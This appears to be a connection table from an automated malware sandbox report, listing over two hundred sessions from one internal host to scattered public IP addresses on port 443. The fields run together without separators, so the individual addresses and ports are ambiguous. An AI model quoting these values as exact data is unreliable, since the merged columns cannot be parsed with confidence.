                                          19524192.168.2.2342192220.164.246.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19525192.168.2.234511447.206.134.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19526192.168.2.234129620.191.167.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19527192.168.2.233422669.127.189.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19528192.168.2.233310286.127.107.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19529192.168.2.2358636188.154.81.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19530192.168.2.235857613.46.69.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19531192.168.2.2335000113.140.92.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19532192.168.2.2343554152.138.239.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19533192.168.2.233565820.173.149.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19534192.168.2.2355244135.126.121.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19535192.168.2.233579223.124.120.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19536192.168.2.2358794160.62.111.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19537192.168.2.2351872213.173.50.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19538192.168.2.234961242.254.233.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19539192.168.2.2352352108.64.225.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19540192.168.2.2353610115.104.162.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19541192.168.2.2347744114.4.112.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19542192.168.2.2348734112.0.178.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19543192.168.2.2339280144.105.146.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19544192.168.2.235561258.70.167.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19545192.168.2.2351698123.65.5.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19546192.168.2.2337786130.163.121.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19547192.168.2.2359370106.26.53.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19548192.168.2.2360166110.65.241.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19549192.168.2.2337290185.151.151.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19550192.168.2.2337736203.197.25.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19551192.168.2.234275046.89.139.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19552192.168.2.2343194104.218.105.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19553192.168.2.235343218.176.202.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19554192.168.2.2349104212.179.119.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19555192.168.2.2359892151.90.169.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19556192.168.2.2354350142.177.30.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19557192.168.2.23515601.25.5.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19558192.168.2.235724617.86.7.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19559192.168.2.2352828119.58.191.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19560192.168.2.234582050.181.240.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19561192.168.2.2354494134.100.77.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19562192.168.2.2351768130.193.5.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19563192.168.2.233321657.179.39.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19564192.168.2.2359774199.27.180.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19565192.168.2.2350944187.131.205.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19566192.168.2.2352312182.115.78.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19567192.168.2.2351112130.196.169.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19568192.168.2.2339382121.222.199.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19569192.168.2.2341104110.48.235.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19570192.168.2.2346424208.10.25.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19571192.168.2.233426049.66.252.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19572192.168.2.2355992157.153.217.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19573192.168.2.2337916155.136.133.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19574192.168.2.2345886220.217.73.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19575192.168.2.2357774142.99.61.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19576192.168.2.235266057.12.209.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19577192.168.2.2356070111.69.65.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19578192.168.2.2344558195.57.235.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19579192.168.2.2333280182.27.53.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19580192.168.2.2333342116.72.242.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19581192.168.2.2346572159.94.223.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19582192.168.2.2345308193.189.47.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19583192.168.2.2353520137.207.251.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19584192.168.2.233932893.39.150.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19585192.168.2.2355896157.2.250.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19586192.168.2.2346348125.76.180.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19587192.168.2.2359576121.12.193.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19588192.168.2.2349594167.184.170.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19589192.168.2.2356910191.193.252.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19590192.168.2.233925635.33.222.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19591192.168.2.2337314191.120.247.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19592192.168.2.2355638194.110.183.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19593192.168.2.2356972158.162.205.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19594192.168.2.234281875.27.79.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19595192.168.2.2335730185.9.95.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19596192.168.2.2346008108.226.148.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19597192.168.2.2335650180.177.228.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19598192.168.2.234270620.95.116.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19599192.168.2.2348244135.228.147.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19600192.168.2.2339526139.39.229.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19601192.168.2.2359250140.28.112.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19602192.168.2.235804420.197.102.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19603192.168.2.2333722135.11.64.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19604192.168.2.2349838166.107.178.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19605192.168.2.2341616171.74.9.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19606192.168.2.2349842131.46.161.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19607192.168.2.2337662201.24.61.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19608192.168.2.2334782120.230.25.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19609192.168.2.23360828.15.198.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19610192.168.2.235703439.71.101.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19611192.168.2.2345646200.153.208.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19612192.168.2.235134234.36.216.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19613192.168.2.234010824.85.44.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19614192.168.2.2342342137.63.128.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19615192.168.2.233314498.27.37.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19616192.168.2.2347606161.89.229.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19617192.168.2.235874832.206.176.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19618192.168.2.2352502147.76.8.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19619192.168.2.2353272197.147.173.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19620192.168.2.233677069.58.43.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19621192.168.2.2348360154.30.44.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19622192.168.2.234258487.20.235.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19623192.168.2.2359942117.229.105.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19624192.168.2.2357048142.134.190.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19625192.168.2.2337566140.92.184.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19626192.168.2.2337326144.226.235.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19627192.168.2.234038691.119.235.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19628192.168.2.234406044.98.22.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19629192.168.2.2339780144.189.205.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19630192.168.2.2336482195.160.228.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19631192.168.2.2341948139.131.122.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19632192.168.2.2347858188.183.154.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19633192.168.2.2356032139.73.200.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19634192.168.2.2339372207.59.234.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19635192.168.2.2340234211.64.74.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19636192.168.2.235171653.110.138.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19637192.168.2.2346092124.244.186.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19638192.168.2.2354516136.147.206.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19639192.168.2.234508077.30.6.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19640192.168.2.235980648.216.8.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19641192.168.2.2348034181.84.198.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19642192.168.2.235296296.234.66.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19643192.168.2.234084619.183.62.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19644192.168.2.2348710159.237.93.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19645192.168.2.2343696187.200.35.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19646192.168.2.2352412103.10.194.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19647192.168.2.2357036220.42.156.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19648192.168.2.2342520174.59.219.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19649192.168.2.2351480178.4.3.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19650192.168.2.2335806139.194.35.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19651192.168.2.234353882.238.192.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19652192.168.2.234454063.245.242.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19653192.168.2.236064437.81.39.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19654192.168.2.235385080.165.72.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19655192.168.2.2355790143.65.173.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19656192.168.2.234073227.82.26.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19657192.168.2.233568864.63.61.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19658192.168.2.234393464.191.76.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19659192.168.2.2359352146.253.253.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19660192.168.2.23605041.175.235.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19661192.168.2.235329289.49.166.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19662192.168.2.235425071.15.151.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19663192.168.2.2358174155.145.129.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19664192.168.2.234238619.16.114.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19665192.168.2.234082678.126.174.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19666192.168.2.234589886.183.111.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19667192.168.2.234390418.210.6.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19668192.168.2.2350938209.76.227.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19669192.168.2.234312242.7.124.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19670192.168.2.233673076.2.81.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19671192.168.2.2345592163.56.21.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19672192.168.2.235484673.153.58.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19673192.168.2.2349620213.128.127.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19674192.168.2.234882246.28.58.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19675192.168.2.2357828220.55.130.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19676192.168.2.2334698154.114.10.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19677192.168.2.23476028.16.224.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19678192.168.2.235640857.251.227.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19679192.168.2.234589451.184.67.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19680192.168.2.2348790101.45.173.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19681192.168.2.235075673.93.202.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19682192.168.2.234218286.212.143.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19683192.168.2.2348178112.33.178.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19684192.168.2.233548270.10.179.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19685192.168.2.235899235.184.215.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19686192.168.2.234785075.45.147.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19687192.168.2.234211619.153.144.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19688192.168.2.2333026192.124.53.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19689192.168.2.234355885.104.108.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19690192.168.2.2356848115.99.232.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19691192.168.2.2334384217.209.11.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19692192.168.2.2360404181.14.212.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19693192.168.2.2354572147.153.58.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19694192.168.2.2360486193.233.138.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19695192.168.2.2351098133.255.48.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19696192.168.2.234954846.24.208.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19697192.168.2.2340318154.159.81.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19698192.168.2.2345698101.97.199.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19699192.168.2.2342016203.203.67.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19700192.168.2.2358698121.167.139.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19701192.168.2.2337274102.232.231.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19702192.168.2.2339538169.152.121.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19703192.168.2.235751441.192.105.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19704192.168.2.2344774198.146.99.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19705192.168.2.2359304174.21.198.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19706192.168.2.233726054.105.218.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19707192.168.2.2338502206.59.61.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19708192.168.2.23589785.239.215.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19709192.168.2.2354000200.143.113.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19710192.168.2.235264414.193.198.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19711192.168.2.233445089.30.186.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19712192.168.2.2333316133.241.193.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19713192.168.2.2346694202.190.149.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19714192.168.2.2351538160.17.199.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19715192.168.2.233406052.247.218.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19716192.168.2.2333864126.45.203.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19717192.168.2.2333090137.140.55.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19718192.168.2.234143044.6.148.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19719192.168.2.235445695.46.249.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19720192.168.2.235214631.177.120.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19721192.168.2.233563863.75.174.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19722192.168.2.2356536138.53.214.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19723192.168.2.2356824169.185.106.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19724192.168.2.2332960194.241.157.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19725192.168.2.235129061.100.185.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19726192.168.2.235066268.219.132.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19727192.168.2.234348481.145.241.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19728192.168.2.2360716104.108.112.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19729192.168.2.2353190203.149.113.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19730192.168.2.2335290175.82.194.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19731192.168.2.2349898167.95.195.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19732192.168.2.2350784206.76.45.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19733192.168.2.2336184222.145.225.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19734192.168.2.2354944122.134.179.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19735192.168.2.236080050.61.200.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19736192.168.2.2341120148.21.242.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19737192.168.2.234720073.128.209.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19738192.168.2.2337022208.87.4.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19739192.168.2.2341486216.177.90.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19740192.168.2.2338572203.254.121.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19741192.168.2.233747867.107.125.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19742192.168.2.2356416222.116.15.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19743192.168.2.233649284.233.39.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19744192.168.2.233543447.30.139.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19745192.168.2.2347438176.12.40.67443
                                          TimestampBytes transferredDirectionData


